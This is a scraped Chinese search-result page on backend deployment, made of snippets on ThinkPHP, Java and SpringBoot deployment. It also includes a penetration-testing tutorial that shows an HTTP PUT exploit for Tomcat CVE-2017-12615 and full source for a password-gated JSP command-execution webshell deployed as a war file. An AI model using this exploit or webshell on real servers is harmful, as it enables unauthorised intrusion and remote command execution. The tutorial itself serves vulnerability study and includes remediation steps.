精华内容
下载资源
问答
  • java后台部署html页面代码.docx
  • 校园小情书后台部署教程wechatAlliance-master.zip
  • TP3.2前后台部署

    千次阅读 2017-12-02 21:13:43
    学习框架,前后台部署是非常必要的一步,虽然只是简单的几步,但对于初学者还是有一定的阻塞,下面LZ将对TP3.2的前后台部署进行详细的讲述。

    学习框架,前后台部署是非常必要的一步,虽然只是简单的几步,但对于初学者还是有一定的阻塞,下面LZ将对TP3.2的前后台部署进行详细的讲述。

    步骤详解

    1、首先页面访问TP文件,自动生成模块文件

    2、复制Application应用文件下的Home,修改为后台目录Admin
    3、在Admin下的Conf中config.php文件中设置配置
    return array(
    	//'配置项'=>'配置值'
    	'DEFAULT_MODULE'        =>  'Admin',  // 默认模块
    	'DEFAULT_CONTROLLER'    =>  'Index', // 默认控制器名称
    	'DEFAULT_ACTION'        =>  'index', // 默认操作名称
    );

    图片展示:

    [注意]

    Admin下的文件命名空间注意修改为Admin
    ag: namespace Home/Controller;  ---->修改为  namespace Admin/Controller;

    至此,前后台可分离访问!

    演示详解

    后台通过localhost/tp3/index.php/Admin/访问!!!



    本次讲述到此结束!!!


    展开全文
  • app后端 服务器端 后台 部署

    千次阅读 2015-02-09 15:16:22
    app后台部署

    最近看到有网友问道手机app服务器端如何部署的问题。我干脆画了个图。因为本人是做JAVA开发的,以JAVA环境为例。如图:


    展开全文
  • Java 后台部署Linux 服务器简单记录

    千次阅读 2016-03-25 13:02:53
    Java 后台部署Linux 服务器简单记录整理电脑资料的时候,发现去年7月自己写的一篇关于Java后台项目部署Linux服务器的笔记。上传下博客,可能当时候的笔记也不是很理解到位。如有错误,欢迎指正。 准备工作 将需要...

    Java 后台部署Linux 服务器简单记录

    整理电脑资料的时候,发现去年7月自己写的一篇关于Java后台项目部署Linux服务器的笔记。上传下博客,可能当时候的笔记也不是很理解到位。如有错误,欢迎指正。
    

    准备工作
    将需要部署到服务器上的文件压缩。(文件目录,在本地项目目录下,具体如截图)
    11

    详细步骤如下:
    将压缩好的文件,通过SFTP传入到服务器。这边用到了工具SecureCRT。截图如下:
    22

    传文件:
    33

    第五步:
    进入到服务器部署路径:/opt/xxxx_backend/webapps/backend

    $cd /opt/xxxx_backend/webapps/backend

    第六步:
    将通过SFTP传入的压缩文件,拷贝到当前路径下。然后进行解压。(例如xx.zip是传入的文件)

    //移动文件到当前目录
    mov ~/xx.zip ./
    //解压xx.zip文件到当前目录
    unzip xx.zip

    第七步:
    重新启动服务器

    1、进入到/opt/xxxx_backend/bin目录下。

    $cd /opt/xxxx_backend/bin

    2、重启

    $sh restart.sh
    展开全文
  • 文章目录一、远程代码执行漏洞(CVE-2017-12615)二、信息泄露漏洞(CVE-2017-12616)三、弱口令➕后台部署war文件 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由...

    Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。
    Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

    一、远程代码执行漏洞(CVE-2017-12615)

    影响版本:
    Apache Tomcat 7.0.0 – 7.0.81

    漏洞原理

    在Windows服务器上,若Tomcat配置文件中的readonly参数设置为 false 时,则可通过 HTTP PUT 请求方法来创建JSP文件,造成任意代码执行漏洞。

    那是指当readonly设置为false时,就可以通过HTTP PUT方法来创建jsp文件吗?

    不是这样的。这里就要提到DefaultServlet和JspServlet,DefaultServlet的作用是处理静态文件 ,而JspServlet 的作用是处理 jsp 与 jspx 文件的请求。以下是默认配置情况:
    在这里插入图片描述
    DefaultServlet 可以处理 PUT 或 DELETE 请求,而 JspServlet 中没有 PUT 上传的逻辑,PUT 的代码实现只存在于 DefaultServlet 中。所以这个漏洞需要给jsp文件构造特殊后缀名,绕过 tomcat 检测,让它用 DefaultServlet 的逻辑去处理请求,从而上传 jsp 文件。

    漏洞复现

    漏洞环境:vulhub

    运行该漏洞环境:
    在这里插入图片描述
    运行成功后,我们查看容器ID。在这里插入图片描述
    进到该容器中。
    在这里插入图片描述
    查看conf文件夹下的web.xml文件。我们发现 readonly 默认设置为 true,当 readonly 设置为 false 时,可以通过 PUT / DELETE 进行文件操控。
    在这里插入图片描述
    在该配置文件中,readonly是设置为false的
    在这里插入图片描述
    接下来我们就要构造数据包了,在构造数据包时,需要构造绕过检测的jsp文件名,有以下三种方式:

    test.jsp%20             //针对Apache Tomcat 7.0.0 – 7.0.81
    test.jsp:$DATA	       //针对Apache Tomcat 7.0.0 – 7.0.81
    test.jsp/      //任意版本,所以这种利用方法不属于该cve漏洞,但利用方式相同
    

    构造数据包,数据包格式如下:

    PUT /test.jsp%20 HTTP/1.1
    Host: your-ip:8080
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 5
    
    <%out.print("hello");%>
    

    我这里写的是输出hello,你也可以更改成你自己的shell。

    由于我测试的漏洞环境中Apache Tomcat 版本是8.x的,所以使用第三种文件名绕过方法。

    在这里插入图片描述
    运行结果如下:
    在这里插入图片描述

    漏洞修复

    1. 配置 conf/webxml 文件的 readOnly 值为 Ture
    2. 如果没有业务需求,禁用PUT方法
    3. 升级Apache Tomcat的版本
    4. 使用WAF

    二、后台部署war文件

    漏洞原理

    Tomcat 支持在后台部署war文件,可以直接将webshell部署到web目录下。若后台管理页面存在弱口令,则可以通过爆破获取密码。

    Tomcat默认情况下是不允许任何人登录管理后台的,所以并没有设置的默认密码与用户名。但是如果有使用后台管理的需要时,可以在用户配置文件中(tomcat-users.xml)手动设置用户名和密码,并且根据其需要的功能设置用户权限。

    其后台管理权限分为两种:一种是用于管理所部署Web应用,以manager开头,一个是用于管理虚拟主机,以admin开头。

    manager(后台管理)功能页面地址
    manager-gui拥有html页面的访问权限/manger/html
    manager-status拥有查看status的权限/manager/status
    manager-script拥有text接口的权限和status权限/manager/text/命令?参数
    manager-jmx拥有jmx权限和status权限
    host-manager(虚拟主机管理)功能页面地址
    admin-gui拥有html页面的访问权限/host-manager/html
    admin-script拥有text接口的权限和status权限/manager/text/命令?参数

    漏洞复现

    漏洞环境:vulhub
    Tomcat版本:8.0

    启动docker容器并且进入容器中查看tomcat-users.xml文件。命令如下:
    在这里插入图片描述
    查看tomcat-users.xml文件可见,用户tomcat拥有上述所有权限,密码是tomcat。所以我们接下来去访问/manger/html界面去登录后台。登录后的界面为:
    在这里插入图片描述
    将界面往下拉,就看到上传war包的地方了。
    在这里插入图片描述

    将命令执行写入test1.jsp中:

    <%@ page language="java" contentType="text/html; charset=GBK"
        pageEncoding="UTF-8"%>
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    
        <head>
            <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
            <title>一句话木马</title>
        </head>
    
        <body>
            <%
            if ("admin".equals(request.getParameter("pwd"))) {
                java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
                int len = -1;
                byte[] bytes = new byte[4092];
                out.print("<pre>");
                while ((len = input.read(bytes)) != -1) {
                    out.println(new String(bytes, "GBK"));
                }
                out.print("</pre>");
            }
        %>
        </body>
    
    </html>
    
    

    并且将其打包成war包(打包方法参考:https://blog.csdn.net/Blood_Pupil/article/details/88660728)。
    在这里插入图片描述
    上传war包,显示ok则为上传成功。
    在这里插入图片描述
    访问上传的jsp文件。
    在这里插入图片描述
    命令执行成功!

    展开全文
  • 准备工作 1,安装jdk8或者jdk11 ...java后台 一,源码导入 1,首先下载源码 上图中的Java后台源码,下载到桌面并解压 2,点击open导入上图的java源码,下面两种方式都可以 3,选择你解压后的源码...
  • springboot项目后台部署运行

    万次阅读 2018-04-27 12:49:05
    4、要想后台运行,我们想随时关闭窗口,这里使用到的是nohup命令,通常与&一起使用,这里的命令为 nohup java -jar app.jar & 5.nohup 用途:不挂断地运行命令。 语法:nohup Command [ Arg … ] [ & ]  无论是否...
  • Tomcat后台部署war木马getshell

    千次阅读 2020-11-06 15:32:57
    昨儿个面试被问到如何通过tomcat拿shell,之前只是看到,没做过...进入靶场,找到后台。默认的话是在manager 准备好马,打包成war包 <%@ page language="java" contentType="text/html; charset=GBK" pageEncod
  • 渗透测试-Weblogic后台部署War大马

    千次阅读 2020-07-14 12:19:06
    本环境模拟了一个真实的 Weblogic 环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对 Weblogic 场景的渗透。 环境 版本 Weblogic 10.3.6(11g) Java 1.6 漏洞环境...
  • 微信小程序后台部署

    2020-11-15 12:10:39
    微信小程序后台部署 1.准备工作 购买云服务器(有15天免费的) https://cloud.tencent.com/ 域名注册(有几块钱一年的)注册完成后解析云服务器ip https://console.cloud.tencent.com/domain 域名申请免费ssl证书 ...
  • Linux 运行jar包命令如下: 方式一: java-jarXXX.jar 特点:当前ssh窗口被...代表在后台运行。 特定:当前ssh窗口不被锁定,但是当窗口关闭时,程序中止运行。 继续改进,如何让窗口关闭时,程序仍然运行? ...
  • Jboss 5.x/6.x版本不能使用jmx Console部署war包,但可以用administrator Console部署, Jboss 4.0部署war包getshell(点击) 使用账号密码登录后台 登录进admin-console后台后,点击Web Application(WAR)s ,然后...
  • --build是负责项目打包部署 一般将项目开发完成之后,需要进行服务器部署(Linux) --> <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <...
  • 后台jetty中的地址不能够提出到common.properties中;否则报错 只需要修改common.properties就可以 5.打包war包 6.部署 部署需要变动: nginx中dist的位置:/usr/share/nginx/html jetty中的war...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 234,013
精华内容 93,605
关键字:

后台部署